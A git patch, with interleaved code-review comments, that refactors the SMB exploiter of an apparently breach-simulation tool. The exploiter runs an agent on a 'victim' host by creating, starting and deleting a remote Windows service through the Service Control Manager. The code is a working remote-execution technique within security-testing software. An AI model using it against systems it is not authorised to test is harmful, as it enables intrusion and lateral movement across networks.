From db09fe0cae30f18835fa2414c4dff4b26e680765 Mon Sep 17 00:00:00 2001
From: Kekoa Kaaikala
Date: Thu, 6 Oct 2022 14:49:36 +0000
Subject: [PATCH] Agent: Extract method _run_agent_on_victim
---
 monkey/infection_monkey/exploit/smbexec.py | 64 +++++++++++----------
 1 file changed, 33 insertions(+), 31 deletions(-)
diff --git a/monkey/infection_monkey/exploit/smbexec.py b/monkey/infection_monkey/exploit/smbexec.py
index a9b19a08a..9a572135c 100644
--- a/monkey/infection_monkey/exploit/smbexec.py
+++ b/monkey/infection_monkey/exploit/smbexec.py
@@ -69,37 +69,7 @@ class SMBExploiter(HostExploiter):
 return self.exploit_result
- scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
- resp = scmr.hROpenSCManagerW(scmr_rpc)
- sc_handle = resp["lpScHandle"]
-
- # start the monkey using the SCM
- try:
- resp = scmr.hRCreateServiceW(
- scmr_rpc,
- sc_handle,
- SMBExploiter.SMB_SERVICE_NAME,
- SMBExploiter.SMB_SERVICE_NAME,
- lpBinaryPathName=cmdline,
- )
- except DCERPCSessionError as err:
- if err.error_code == 0x431:
- logger.debug(f'SMB service "{SMBExploiter.SMB_SERVICE_NAME}" already exists')
- resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME)
- else:
- self.exploit_result.error_message = str(err)
- return self.exploit_result
-
- service = resp["lpServiceHandle"]
- try:
- scmr.hRStartServiceW(scmr_rpc, service)
- status = ScanStatus.USED
- except Exception:
- status = ScanStatus.SCANNED
- pass
- self.telemetry_messenger.send_telemetry(T1035Telem(status, UsageEnum.SMB))
- scmr.hRDeleteService(scmr_rpc, service)
- scmr.hRCloseServiceHandle(scmr_rpc, service)
+ self._run_agent_on_victim(scmr_rpc, cmdline)
 logger.info(
 "Executed monkey '%s' on remote victim %r (cmdline=%r)",
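Review bot: The new call `self._run_agent_on_victim(scmr_rpc, cmdline)` ignores the helper's return value, so the early exit the inline code had is lost. When `hRCreateServiceW` raises a `DCERPCSessionError` other than 0x431, the helper added in the second hunk sets `error_message` and returns `self.exploit_result`, but that now only leaves the helper; the caller falls through to the `logger.info("Executed monkey ...")` context line and whatever follows it outside this hunk. Have the helper report failure explicitly, for example annotate it `-> bool` and guard the call with `if not self._run_agent_on_victim(scmr_rpc, cmdline): return self.exploit_result`. The enclosing method starts and ends outside the hunk, so any success flags set after the log call should be checked against this path as well.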
@@ -219,3 +189,35 @@ class SMBExploiter(HostExploiter):
 return scmr_rpc
 return None
+
+ def _run_agent_on_victim(self, scmr_rpc: DCERPC_v5, cmdline: str):
+ scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
+ resp = scmr.hROpenSCManagerW(scmr_rpc)
+ sc_handle = resp["lpScHandle"]
+
+ try:
+ resp = scmr.hRCreateServiceW(
+ scmr_rpc,
+ sc_handle,
+ SMBExploiter.SMB_SERVICE_NAME,
+ SMBExploiter.SMB_SERVICE_NAME,
+ lpBinaryPathName=cmdline,
+ )
+ except DCERPCSessionError as err:
+ if err.error_code == 0x431:
+ logger.debug(f'SMB service "{SMBExploiter.SMB_SERVICE_NAME}" already exists')
+ resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME)
+ else:
+ self.exploit_result.error_message = str(err)
+ return self.exploit_result
+
+ service = resp["lpServiceHandle"]
+ try:
+ scmr.hRStartServiceW(scmr_rpc, service)
+ status = ScanStatus.USED
+ except Exception:
+ status = ScanStatus.SCANNED
+ pass
+ self.telemetry_messenger.send_telemetry(T1035Telem(status, UsageEnum.SMB))
+ scmr.hRDeleteService(scmr_rpc, service)
+ scmr.hRCloseServiceHandle(scmr_rpc, service)
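Review bot: The `except Exception:` around `scmr.hRStartServiceW` in `_run_agent_on_victim` records `ScanStatus.SCANNED` but discards the error, so a failed start leaves nothing in the log to explain it, and the `pass` after the assignment is dead code. Bind and log the exception instead, `except Exception as err:` followed by `logger.debug(f"Failed to start the SMB service: {err}")`, and drop the `pass`. Separately, `sc_handle` from `hROpenSCManagerW` is never passed to `hRCloseServiceHandle`. If `send_telemetry` raises, the `hRDeleteService` and `hRCloseServiceHandle` calls are skipped and the service created for the test stays registered on the target; a `try`/`finally` around the start-and-report step would make that cleanup unconditional.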